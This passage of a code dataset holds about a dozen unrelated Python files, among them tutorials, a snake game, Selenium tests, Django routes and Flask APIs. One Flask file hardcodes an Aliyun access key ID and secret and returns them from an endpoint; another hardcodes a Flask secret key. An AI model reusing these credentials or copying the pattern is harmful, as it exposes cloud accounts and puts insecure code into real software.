定义一个内嵌的包装函数,给传入的函数加上计时功能的包装\r\n #此处若不用wraps,包装后用反射显示函数名是wrapper,所以用反射会出现问题,为避免该情况,要用functools.wraps\r\n @wraps(func)\r\n def wrapper(): \r\n start = time.clock() \r\n b=func() \r\n end =time.clock() \r\n print('used:', end - start)\r\n print(b+1)\r\n # 将包装后的函数返回 \r\n return wrapper \r\n\r\n'''原理'''\r\ndef foo():\r\n print('in foo()')\r\n c=1\r\n return c\r\n\r\n'''语法糖,其实就是foo=timeit(foo)的简写'''\r\n@timeit\r\ndef simple_foo():\r\n print('in simple_foo()')\r\n a=1\r\n return a\r\n\r\ndef timeit2(func,*args): \r\n # 定义一个内嵌的包装函数,给传入的函数加上计时功能的包装\r\n @wraps(func,*args)\r\n def wrapper(*args): \r\n start = time.clock() \r\n result=func()\r\n end =time.clock() \r\n print('used:', end - start)\r\n for i in range(len(result[\"a\"])):\r\n print(result[\"a\"][i])\r\n # 将包装后的函数返回 \r\n return wrapper\r\n\r\nclass decorator(): \r\n @staticmethod\r\n def foo(*args):\r\n s='A foo()'\r\n a=args\r\n print(s)\r\n return {\"s\":s,\"a\":a}\r\n \r\n @staticmethod\r\n @timeit2\r\n def simple_foo(*args):\r\n s='A simple_foo()'\r\n a=args\r\n print(s)\r\n return {\"s\":s,\"a\":a}\r\n \r\n @staticmethod\r\n @timeit2\r\n def simple_foo2(a1,a2):\r\n s='A simple_foo()'\r\n print(s)\r\n return {\"s\":s,\"a1\":a1,\"a2\":a2}\r\n \r\ndef timeit3(func): \r\n # 定义一个内嵌的包装函数,给传入的函数加上计时功能的包装 \r\n def wrapper(): \r\n start = time.clock() \r\n result=func()\r\n end =time.clock() \r\n print('used:', end - start)\r\n print(result[\"a\"])\r\n # 将包装后的函数返回 \r\n return wrapper\r\n\r\nx=1\r\nclass decorator2(): \r\n @staticmethod\r\n def foo():\r\n s='A foo()'\r\n a=1\r\n print(s)\r\n print(x)\r\n return {\"s\":s,\"a\":a}\r\n \r\n @staticmethod\r\n @timeit3\r\n def simple_foo():\r\n s='A simple_foo()'\r\n a=2\r\n print(s)\r\n return {\"s\":s,\"a\":a}\r\n \r\ndef bread(func) : \r\n def wrapper() : \r\n print(\"\")\r\n func() \r\n print(\"<\\______/>\")\r\n return wrapper \r\n\r\n#累积装饰器,是有先后顺序的,越靠近func的越晚执行\r\ndef ingredients(func) : \r\n def wrapper() : \r\n print(\"#tomatoes#\")\r\n func() \r\n print(\"~salad~\")\r\n return wrapper \r\n \r\ndef sandwich(food=\"--ham--\") : \r\n print(food)\r\n\r\n@ingredients \r\n@bread \r\ndef strange_sandwich(food=\"--ham--\") : \r\n print(food)\r\n \r\n\r\nif __name__ == '__main__':\r\n foo=timeit(foo)\r\n foo()\r\n print(foo.__name__)\r\n\r\n simple_foo()\r\n print(simple_foo.__name__)\r\n\r\n decorator.foo(1)\r\n foo=timeit2(decorator.foo)\r\n foo(2,3)\r\n decorator.simple_foo(3,4)\r\n print(\"decorator.simple_foo函数名是\"+decorator.simple_foo.__name__)\r\n \r\n print('--------')\r\n decorator2.foo()\r\n foo=timeit3(decorator2.foo)\r\n foo()\r\n decorator2.simple_foo()\r\n\r\n print\r\n sandwich()\r\n print\r\n sandwich = bread(ingredients(sandwich))\r\n sandwich()\r\n print\r\n strange_sandwich()\r\n ","sub_path":"src/base/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505053326","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# def weierstrass(x):\ndef f(x):\n result = 0\n for i in range(0,101):\n result += (a**i)*(np.cos((b**i)*np.pi*x))\n return result\n\nN = 2\na = 0.0\nb = 0.5\n\n# a_new to address singularities in the integral\na_new = a+ 0.000000001\n# # 2) Adaptive Trapezoidal Rule\n# # Since the adaptive trapezoidal needs the integral value of the (i-1)th integral,\n# # it should be coded too\n\n# # Trapezoidal method written with reference to the formula\n\ndef trapezoidal(N):\n h = (b-a_new)/N\n s = 0.5*f(a_new) + 0.5*f(b)\n for i in range(1,N):\n s = s + f(a_new+(i*h))\n s = s*h\n return s\n# print(\"trap: \", trapezoidal(N))\n\n# Helper function calculating adaptive method to calculate the odd steps of the integral.\ndef adaptive(N):\n h = (b-a)/N\n s = 0\n for i in range(1, N, 2):\n s += f(a+(i*h))\n s = s*h\n return s\n# print(\"adap: \", adaptive(N))\n\n\n# error array \ne = []\n# result array\nr = []\n# slices array\nslices = []\n# for plotting graph\nx = []\ny = []\n\ndef adaptive_trapezoidal(N):\n error = 1\n # anything more accurate than 1.0e-4 will take too long to compute\n accuracy = 1.0e-5\n s = trapezoidal(N)\n s_old = s\n while error > accuracy:\n N = N*2\n s = s_old/2.0 + adaptive(N)\n error = abs(s-s_old)/3.0\n s_old = s\n # print(error)\n # print(N)\n # print(error)\n x.append(math.log(N/2,2))\n y.append(math.log(error,10))\n e.append(error)\n r.append(s)\n slices.append(N)\n # return(s)\n return s\n\nadaptive_trapezoidal(N)\n\n# for i in range(0, len(e)):\n# print(i,\"th Error: \", e[i],\"Result: \", r[i], \"Slices: \", slices[i])\n\n# # print(\"Adaptive Trapezoidal Rule: \", adaptive_trapezoidal(N))\n\n# plt.figure()\n# plt.title('This is the Adaptive Trapezoidal results')\n# plt.plot(x,y,'*-')\n# plt.xlabel(r'$log_2(N/10)$')\n# plt.xlim(0,max(x))\n# plt.ylabel(r'$log_{10}(Integral_Result)$')\n# plt.show()","sub_path":"numerical_integrals/Q2_Adaptive_Trapezoidal_Weierstrass.py","file_name":"Q2_Adaptive_Trapezoidal_Weierstrass.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574992544","text":"import pygame\nfrom pygame.locals import *\nfrom random import randint\n\n\ndef colisão(c1, c2):\n return (c1[0] == c2[0]) and (c1[1] == c2[1])\n\n\ndef grid():\n x = randint(0, 59)\n y = randint(0, 59)\n return x * 10, y * 10\n\n\ndef Jogo():\n cima = 0\n direita = 1\n baixo = 2\n esquerda = 3\n\n pygame.init()\n screen = pygame.display.set_mode((600, 600))\n pygame.display.set_caption('Ebony * Snake')\n\n snake = [(200, 200), (210, 200), (220, 200)]\n snake_skin = pygame.Surface((10, 10))\n\n maçã = pygame.Surface((10, 10))\n maçã.fill((255, 0, 0)) # Vermelho\n maçã_pos = grid()\n\n direção = esquerda\n\n velocidade = pygame.time.Clock()\n\n pygame.font.init()\n font = pygame.font.SysFont('Ubuntu', 18)\n pontos = 0\n\n gameover = False\n\n while not gameover:\n if pontos < 10:\n velocidade.tick(10)\n snake_skin.fill((205, 205, 205))\n elif pontos < 20:\n velocidade.tick(12)\n snake_skin.fill((0, 127, 225))\n elif pontos < 40:\n velocidade.tick(14)\n snake_skin.fill((235, 199, 158))\n elif pontos < 60:\n velocidade.tick(18)\n snake_skin.fill((255, 0, 255))\n elif pontos < 100:\n velocidade.tick(20)\n snake_skin.fill((127, 0, 255))\n elif pontos < 150:\n velocidade.tick(25)\n snake_skin.fill((255, 165, 0))\n elif pontos < 200:\n velocidade.tick(30)\n snake_skin.fill((255, 255, 0))\n elif pontos < 250:\n velocidade.tick(35)\n snake_skin.fill((140, 23, 23))\n\n else:\n velocidade.tick(40)\n snake_skin.fill((255, 0, 0))\n\n for evento in pygame.event.get():\n if evento.type == QUIT:\n pygame.quit()\n exit()\n\n if evento.type == KEYDOWN:\n if evento.key == K_UP and direção != baixo:\n direção = cima\n if evento.key == K_DOWN and direção != cima:\n direção = baixo\n if evento.key == K_LEFT and direção != direita:\n direção = esquerda\n if evento.key == K_RIGHT and direção != esquerda:\n direção = direita\n\n if colisão(snake[0], maçã_pos):\n maçã_pos = grid()\n snake.append((0, 0))\n pontos += 1\n\n # Verificando se a snake acerta as laterais.\n if snake[0][0] == 600 or snake[0][1] == 600 or snake[0][0] < 0 or snake[0][1] < 0:\n gameover = True\n break\n\n # Verificando se a snake acerta a si mesma.\n for i in range(1, len(snake) - 1):\n if snake[0][0] == snake[i][0] and snake[0][1] == snake[i][1]:\n gameover = True\n break\n\n if gameover:\n break\n\n for i in range(len(snake) - 1, 0, -1):\n snake[i] = (snake[i - 1][0], snake[i - 1][1])\n\n # Movimentação incrementada\n if direção == cima:\n snake[0] = (snake[0][0], snake[0][1] - 10)\n if direção == baixo:\n snake[0] = (snake[0][0], snake[0][1] + 10)\n if direção == direita:\n snake[0] = (snake[0][0] + 10, snake[0][1])\n if direção == esquerda:\n snake[0] = (snake[0][0] - 10, snake[0][1])\n\n screen.fill((0, 0, 0))\n screen.blit(maçã, maçã_pos)\n\n # Desenho das linhas\n for x in range(0, 600, 10):\n pygame.draw.line(screen, (40, 40, 40), (x, 0), (x, 600))\n for y in range(0, 600, 10):\n pygame.draw.line(screen, (40, 40, 40), (0, y), (600, y))\n\n pontos_font = font.render('Pontos: %s' % pontos, True, (255, 255, 255))\n pontos_rect = pontos_font.get_rect()\n pontos_rect.topleft = (600 - 120, 10)\n screen.blit(pontos_font, pontos_rect)\n\n for posição in snake:\n screen.blit(snake_skin, posição)\n\n pygame.display.update()\n\n while True:\n gameover_font = pygame.font.Font(None, 90)\n gameover_screen = gameover_font.render('Game Over!', True, (0, 220, 0))\n gameover_rect = gameover_screen.get_rect()\n gameover_rect.midtop = (500 / 2, 10)\n screen.blit(gameover_screen, gameover_rect)\n name_font = pygame.font.Font(None, 30)\n name_screen = name_font.render('@ebony.prog', True, (0, 255, 200))\n name_rect = name_screen.get_rect()\n name_rect.midtop = (500 / 3.5, 65)\n screen.blit(name_screen, name_rect)\n\n pygame.display.update()\n pygame.time.wait(500)\n\n while True:\n for evento in pygame.event.get():\n if evento.type == QUIT:\n pygame.quit()\n exit()\n","sub_path":"snake/snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121028255","text":"from django.urls import path\nfrom .views import signupView, HomeView, BusinessProfilesView, CustomerProfilesView, EditProfileView , CategoryMenu , SearchedView , DetailPageView, DirectionsView, logoutview, Dashboard, AboutPage\nfrom .views import Editsite, VisitsiteView, DomainView, RecomendView, NameSearchView\nfrom Responses.views import ReviewsView\n\nurlpatterns = [\n path('accounts/signup/', signupView, name=\"signup\"),\n path('', HomeView, name=\"home\"),\n path('searchedbiz',NameSearchView,name=\"searchedname\"),\n path('recommend',RecomendView,name=\"rec\"),\n path('accounts/logout/',logoutview,name='logout'),\n path('profiles/business/', BusinessProfilesView, name='BusinessPro'),\n path('profiles/customer/', CustomerProfilesView, name='CustomerPro'),\n path('editmyprofile',EditProfileView,name=\"editprofile\"),\n path('category//',CategoryMenu,name='categorymenu'),\n path('searched/business/',SearchedView,name='searched'),\n path('details///',DetailPageView,name='details'),\n path('directions//',DirectionsView,name='directions'),\n path('dashboard/',Dashboard,name='dashboard'),\n path('pages/about',AboutPage,name=\"AboutPage\"),\n path('Editsite',Editsite,name=\"editsite\"),\n path('typ/name',DomainView),\n path('Visitsite//',VisitsiteView, name='sitevisit'),\n\n\n\n\n]\n","sub_path":"Pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336269713","text":"#-*- coding: utf-8 -*-\n\nfrom selenium import webdriver\nimport os\nimport time\nimport unittest\nimport sys, traceback\nimport random\nimport platform\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import Select\n\nPATH = lambda p: os.path.abspath(\n os.path.join(os.path.dirname(__file__), p)\n)\n\nclass filter_oneroomTest(unittest.TestCase):\n\n def __init__(self, x):\n super().__init__()\n self.x = x\n\n def moveTab(self, x):\n window_before = self.driver.window_handles[x]\n self.driver.switch_to_window(window_before)\n return time.sleep(2)\n\n def setUp(self):\n self.chromeDriver = PATH('../drivers/chromedriver')\n self.driver = webdriver.Chrome(executable_path=self.chromeDriver)\n self.wait = WebDriverWait(self.driver, 5)\n\n def runTest(self):\n count = 0\n while True:\n try:\n zigbangUrl = \"https://www.zigbang.com/\"\n\n # 0. 직방 웹페이지 접속\n\n self.driver.get(zigbangUrl)\n time.sleep(1)\n\n self.driver.add_cookie({'name': 'cookie_sms_app_down', 'value': 'true'})\n # 지도 앱 다운로드 팝업 쿠키 True 값 고정\n\n self.driver.maximize_window()\n\n # 1. 원,투룸 접속\n\n self.wait.until(EC.visibility_of_element_located((By.CLASS_NAME, 'has_d2'))).click()\n time.sleep(1)\n\n # 2. 방 구조 '오픈형 원룸' 선택 및 유효성 검사\n\n checkOption = self.wait.until(EC.visibility_of_any_elements_located((By.XPATH, \"//input[@type='checkbox']\")))\n\n for i in range(1,5,1):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n openType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in openType:\n if not (i.text == u\"오픈형 원룸\"):\n raise Exception(u\"방구조가 오픈형 원룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-1. 방 구조 '분리형 원룸' 선택 및 유효성 검사\n\n for i in reversed(range(0,2,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n partroomType = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in partroomType:\n if not (i.text == u\"분리형 원룸\"):\n raise Exception(u\"방구조가 분리형 원룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-2. 방 구조 '복층형 원룸' 선택 및 유효성 검사\n\n for i in reversed(range(1,3,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n upType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in upType:\n if not (i.text == u\"복층형 원룸\"):\n raise Exception(u\"방구조가 복층형 원룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-3. 방 구조 '투룸' 선택 및 유효성 검사\n\n for i in reversed(range(2,4,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n tworoomType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in tworoomType:\n if not (i.text == u\"투룸\"):\n raise Exception(u\"방구조가 투룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-4. 방 구조 '쓰리룸+' 선택 및 유효성 검사\n\n for i in reversed(range(3,5,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n threeroomType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in threeroomType:\n if not (i.text == u\"쓰리룸\"+u\"+\"):\n raise Exception(u\"방구조가 쓰리룸+ 이 아닌 매물이 존재합니다.\", i.text)\n\n for i in range(0,4):\n checkOption[i].click()\n time.sleep(1)\n time.sleep(3)\n\n # 3. 보증금 검색 조건 랜덤 선택\n\n emptyDeposit = []\n\n depositStart = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'deposit_s'))))\n depositEnd = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'deposit_e'))))\n # 샐랙트 박스의 값\n\n depositOption = self.wait.until(EC.visibility_of_element_located((By.XPATH, \"//select[@name='deposit_s']\")))\n depositoptValue = depositOption.find_elements_by_tag_name(\"option\")\n\n for i in depositoptValue:\n emptyDeposit.append(i.get_attribute(\"value\"))\n\n depositstartValue = [i.text for i in depositStart.options]\n depositendValue = [i.text for i in depositEnd.options]\n # 샐랙트 박스에 대한 옵션 값들\n\n minDeposit = random.randint(1, len(depositstartValue) - 1)\n maxDeposit = random.randint(minDeposit,len(depositendValue) - 1)\n # (1,18)\n\n depositStart.select_by_visible_text(depositstartValue[minDeposit])\n time.sleep(3)\n depositEnd.select_by_visible_text(depositendValue[maxDeposit])\n time.sleep(3)\n # 실제로 셀렉트 박스 선택하는 부분\n\n # 4. 선택된 보증금 필터 값, 실제 매물과 비교\n\n depositCompmin = int(emptyDeposit[minDeposit])\n depositCompmax = int(emptyDeposit[maxDeposit])\n\n itemValue = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, \".i-tit\")))\n # 매물의 금액 값\n\n for i in itemValue:\n depositValue = (i.text).split('/')\n depositEog = depositValue[0].split('억')\n\n if len(depositEog[0]) == 1:\n depositChun = depositEog[1].replace(',', '')\n depositEmpty = int(depositEog[0] + (\"0\" * (4 - len(depositChun))) + depositChun)\n\n else:\n depositChun_Only = depositEog[0].replace(',', '')\n depositEmpty = int(\"0\" * (4 - len(depositChun_Only)) + depositChun_Only)\n\n if not depositCompmin <= depositEmpty <= depositCompmax:\n raise Exception(\"보증금 필터 값과 검색 결과 값이 상이함으로 자동화를 종료합니다.\", depositCompmin, depositEmpty, depositCompmax)\n\n depositStart.select_by_visible_text(depositstartValue[0])\n depositEnd.select_by_visible_text(depositendValue[0])\n\n # 5. 월세 검색 조건 랜덤 선택\n\n emptyRent = []\n\n rentStart = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'rent_s'))))\n rentEnd = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'rent_e'))))\n # 샐랙트 박스의 값\n\n rentOption = self.wait.until(EC.visibility_of_element_located((By.XPATH, \"//select[@name='rent_s']\")))\n rentoptValue = rentOption.find_elements_by_tag_name(\"option\")\n\n for i in rentoptValue:\n emptyRent.append(i.get_attribute(\"value\"))\n\n rentstartValue = [i.text for i in rentStart.options]\n rentendValue = [i.text for i in rentEnd.options]\n # 샐랙트 박스에 대한 옵션 값들\n\n minRent = random.randint(2, len(rentstartValue) - 1)\n maxRent = random.randint(minRent, len(rentendValue) - 1)\n # 2,18\n\n rentStart.select_by_visible_text(rentstartValue[minRent])\n time.sleep(3)\n rentEnd.select_by_visible_text(rentendValue[maxRent])\n time.sleep(3)\n # 실제로 셀렉트 박스 선택하는 부분\n\n # 6. 선택된 월세 필터 값, 실제 매물과 비교\n\n rentCompmin = int(emptyRent[minRent])\n rentCompmax = int(emptyRent[maxRent])\n\n itemValue = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, \".i-tit\")))\n # 매물의 금액\n\n for i in itemValue:\n rentValue = (i.text).split('/')\n rentSpace = rentValue[1].split(' ')\n\n rentEmpty = 0\n\n if len(rentSpace[0]) <= 3:\n rentEmpty = int(rentSpace[0])\n\n if not rentCompmin <= rentEmpty <= rentCompmax:\n raise Exception(\"월세 필터 값과 검색 결과 값이 상이함으로 자동화를 종료합니다.\", rentCompmin, rentEmpty, rentCompmax)\n\n rentStart.select_by_visible_text(rentstartValue[0])\n rentEnd.select_by_visible_text(rentendValue[0])\n\n break\n\n except Exception:\n\n if count == 2:\n raise\n\n else:\n traceback.print_exc(file=sys.stdout)\n print(\"에러 발생 페이지 URL : \", self.driver.current_url)\n self.driver.quit()\n self.setUp()\n count += 1\n\n def tearDown(self):\n self.driver.quit()","sub_path":"wwwauto/www_02_filter_oneroom.py","file_name":"www_02_filter_oneroom.py","file_ext":"py","file_size_in_byte":10196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"15057336","text":"# coding:utf-8\nfrom aliyunsdkcore import client\nfrom aliyunsdksts.request.v20150401 import AssumeRoleRequest\nimport json\nimport oss2\n\nfrom . import api, formart_json\nfrom flask import request, current_app\nfrom Travel.utils.response_code import RET\nfrom flask import jsonify\nfrom Travel import db\nfrom Travel.models import UserAndClockInPics\n\n\n\n@api.route(\"/saveClockPic\", methods=[\"POST\"])\ndef save_clock_pic():\n\n req_dict = request.get_json()\n if req_dict is None:\n return formart_json.formattingjson(data={}, errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n user_id = req_dict.get(\"id\")\n pic_url = req_dict.get(\"url\")\n location_type = req_dict.get(\"locationType\")\n\n if not all([user_id, pic_url, location_type >= 0]):\n return formart_json.formattingjson(data={}, errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n # 添加数据库\n pics = UserAndClockInPics(user_id=int(user_id), url=pic_url, attractions_type=location_type)\n try:\n db.session.add(pics)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"查询数据库异常\")\n\n return formart_json.formattingjson(data={'currentLocation': int(location_type) + 1}, errno=RET.OK, errmsg=\"添加成功\")\n\n\n\n@api.route(\"/getAliOSSToken\", methods=[\"GET\"])\ndef get_alioss_token():\n \"\"\"用户登录\n 参数:姓名、手机号 或者 id\n \"\"\"\n req_dict = request.args\n user_id = req_dict.get(\"id\")\n if not all([user_id]):\n return formart_json.formattingjson(data={}, errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n info = {}\n info['region'] = 'oss-cn-beijing'\n info['accessKeyId'] = 'LTAI4Fw3KZuEbdgwVnfdLePo'\n info['accessKeySecret'] = 'TThvS2I3iGVC8XkYevFPl6cPCJ2ikR'\n info['bucket'] = 'sharui-oss'\n\n return formart_json.formattingjson(data=info, errno=RET.OK, errmsg=\"获取token成功\")\n\n\n\n\n # # Endpoint以杭州为例,其它Region请按实际情况填写。\n # endpoint = 'oss-cn-beijing.aliyuncs.com'\n # # 阿里云主账号AccessKey拥有所有API的访问权限,风险很高。强烈建议您创建并使用RAM账号进行API访问或日常运维,请登录 https://ram.console.aliyun.com 创建RAM账号。\n # access_key_id = 'LTAI4Fw3KZuEbdgwVnfdLePo'\n # access_key_secret = 'TThvS2I3iGVC8XkYevFPl6cPCJ2ikR'\n # bucket_name = 'sharui-oss'\n # # role_arn是角色的资源名称。\n # role_arn = 'acs:ram::1645815546833249:role/sharui'\n #\n #\n #\n # clt = client.AcsClient(access_key_id, access_key_secret, 'cn-beijing')\n # req = AssumeRoleRequest.AssumeRoleRequest()\n #\n # # 设置返回值格式为JSON。\n # req.set_accept_format('json')\n # req.set_RoleArn(role_arn)\n # req.set_RoleSessionName('session-name')\n # body = clt.do_action_with_exception(req)\n #\n # # 使用RAM账号的AccessKeyId和AccessKeySecret向STS申请临时token。\n # token = json.loads(body)\n\n # return formart_json.formattingjson(data={'token': token}, errno=RET.OK, errmsg=\"获取token成功\")\n","sub_path":"Travel/api_1_0/alioss.py","file_name":"alioss.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"271296644","text":"import numpy as np\nimport os\nimport glob\nimport tensorflow as tf\nimport PIL.Image\n\nROOT_DIR = 'data'\nDATA_LIST = glob.glob(ROOT_DIR + '\\\\*\\\\*.jpg')\nIMG_SIZE = 256\nRESIZED_DIR = \"resized\"\n\ndef get_label(path):\n return path.split('\\\\')[1]\n\ndef get_file_name(path):\n return path.split('\\\\')[2]\n\ndef make_dir(label, keyword=\"aug\"):\n dir = ROOT_DIR + \"\\\\\" +label + \"\\\\\"+ keyword + \"\\\\\"\n if not os.path.exists(dir):\n os.makedirs(dir)\n print(\"--> \", dir)\n return dir\n\ndef resize(org_img):\n image = PIL.Image.open(org_img)\n resized = image.resize((IMG_SIZE,IMG_SIZE))\n dir = make_dir(get_label(org_img), RESIZED_DIR)\n resized.save(dir + get_file_name(org_img), \"JPEG\", quality=100)\n return resized\n\ndef write_tf(tf_img, org_img, keyword):\n dir = make_dir(get_label(org_img), keyword)\n enc = tf.io.encode_jpeg(tf_img, quality = 100)\n tf.io.write_file(dir+\"\\\\\"+dir.split('\\\\')[2][0:2]+\"-\"+get_file_name(org_img), enc)\n\ndef augment(res_img):\n image_string = tf.io.read_file(res_img)\n image = tf.image.decode_jpeg(image_string, channels = 3)\n \n flipped = tf.image.flip_left_right(image)\n write_tf(flipped, res_img, \"flipped\")\n\n rotated = tf.image.rot90(image)\n write_tf(rotated, res_img, \"rotated\")\n\n grayscaled = tf.image.rgb_to_grayscale(image)\n write_tf(grayscaled, res_img, \"grayscaled\")\n\n saturated = tf.image.adjust_saturation(image, 3)\n write_tf(saturated, res_img, \"saturated\")\n\n bright = tf.image.adjust_brightness(image, 0.4)\n write_tf(bright, res_img, \"bright\")\n\n\nfor org_img in DATA_LIST:\n resize(org_img)\n res_img = make_dir(get_label(org_img), RESIZED_DIR) + get_file_name(org_img)\n augment(res_img)\n","sub_path":"data_augmentation_template.py","file_name":"data_augmentation_template.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"124107470","text":"N, M, K = list(map(int, input().split()))\nH = list(map(int, input().split()))\nC = set(map(lambda x: int(x) - 1, input().split()))\norder = [(i, H[i]) for i in range(N)]\norder.sort(key=lambda x: x[1])\ngraph = [[] for _ in range(N)]\n\ndp = [float('inf')]*N\nfor _ in range(M):\n A, B = list(map(lambda x: int(x) - 1, input().split()))\n if H[A] > H[B]:\n graph[A].append(B)\n else:\n graph[B].append(A)\n\nfor v, h in order:\n if v in C:\n dp[v] = 0\n else:\n if graph[v]:\n dp[v] = min([dp[x] for x in graph[v]]) + 1\n\nfor ans in dp:\n if ans == float('inf'):\n print(-1)\n else:\n print(ans)","sub_path":"PAST05/I.py","file_name":"I.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"317419965","text":"from flask import Flask,request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_jwt import JWT,jwt_required\nfrom security import authenticate,identity\n\napp = Flask(__name__)\napi = Api(app)\napp.secret_key = 'jose'\njwt = JWT(app,authenticate,identity) \n\nitems = [\n {\n \"name\":\"bag\",\n \"price\":24\n }\n]\n\nclass Item(Resource):\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"price\",\n type=float,\n required=True,\n help=\"This field cannot be left blank!\"\n )\n \n \n @jwt_required()\n def get(self,name):\n data=next(filter(lambda x: x[\"name\"]==name,items),None)\n \n return data,200 if data is not None else 404\n def post(self,name):\n \n if next(filter(lambda x: x[\"name\"]==name,items),None):\n return {\"message\":f\"The item with name {name} alredy exists\"},400\n data = Item.parser.parse_args()\n print(data[\"price\"])\n item = {\"name\":name,\"price\":data[\"price\"]}\n items.append(item)\n return item,201\n @jwt_required()\n def delete(self, name):\n global items\n items = list(filter(lambda x: x['name'] != name, items))\n return {'message': 'Item deleted'}\n def put(self,name):\n# data = request.get_json(force = True)\n data = Item.parser.parse_args()\n item = next(filter(lambda x: x[\"name\"]==name,items),None)\n if item is None:\n item = {\"name\":name,\"price\":data[\"price\"]}\n items.append(item)\n else:\n item.update(data)\n return item\n \n \nclass ItemList(Resource):\n \n def get(self):\n return {\"item\":items}\n def post(self):\n data = request.get_json(force = True)\n item = {\"name\":data[\"name\"],\"price\":data[\"price\"]}\n items.append(item)\n return item\n# def delete(self,name):\n# global items\n# items = list(filter(lambda x: x['name'] != name,items))\n# return {'message':\"item deleted\"}\n \n \napi.add_resource(Item,\"/item/\")\napi.add_resource(ItemList,\"/items\")\n\napp.run(port=1100,debug = True)","sub_path":"Section4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"555006274","text":"import unittest\nfrom ..decorators import batch_apply_ignore_if_unsupported\n\n@batch_apply_ignore_if_unsupported('CONTENTS')\nclass ContentsTestMixin(object):\n def test_contents_name(self: unittest.TestCase,):\n self.assertEqual(\n self.result_set.contents.name,\n self.contents.name,\n \"Contents Name Mismatch\"\n )\n \n def test_contents_publication_status(self: unittest.TestCase,):\n self.assertEqual(\n self.contents.publication_status,\n self.result_set.contents.publication_status,\n \"Series Publication Status Mismatch\"\n )\n \n def test_contents_scanning_status(self: unittest.TestCase,):\n self.assertEqual(\n self.contents.scanning_status,\n self.result_set.contents.scanning_status,\n \"Series Scanning Status Mismatch\"\n )\n \n def test_contents_chapter_count(self: unittest.TestCase,):\n self.assertGreaterEqual(\n len(self.contents.listings),\n self.result_set.contents.min_chapter_count,\n \"Chapter Count Misrepresentation\"\n )\n \n def test_contents_listing_names(self: unittest.TestCase,):\n self.assertEqual(\n self.first_chapter_listing.name,\n self.result_set.first_chapter_listing.name,\n \"First Chapter Listing Name Mismatch\"\n )\n \n self.assertEqual(\n self.last_chapter_listing.name,\n self.result_set.last_chapter_listing.name,\n \"Last Chapter Listing Name Mismatch\"\n )\n \n def test_contents_listing_date(self: unittest.TestCase,):\n self.assertEqual(\n self.first_chapter_listing.date,\n self.result_set.first_chapter_listing.date,\n \"First Chapter Listing Date Mismatch\"\n )\n \n self.assertEqual(\n self.last_chapter_listing.date,\n self.result_set.last_chapter_listing.date,\n \"Last Chapter Listing Date Mismatch\"\n )\n \n def test_contents_listing_url(self: unittest.TestCase,):\n self.assertEqual(\n self.first_chapter_listing.url,\n self.result_set.first_chapter_listing.url,\n \"First Chapter Listing URL Mismatch\"\n )\n \n self.assertEqual(\n self.last_chapter_listing.url,\n self.result_set.last_chapter_listing.url,\n \"Last Chapter Listing URL Mismatch\"\n )","sub_path":"tests/grabbers/test_case/mixins/contents_test_mixin.py","file_name":"contents_test_mixin.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364997429","text":"import itsdangerous\nfrom flask import (request,\n current_app as app,\n redirect,\n url_for,\n flash,\n render_template, make_response)\nfrom 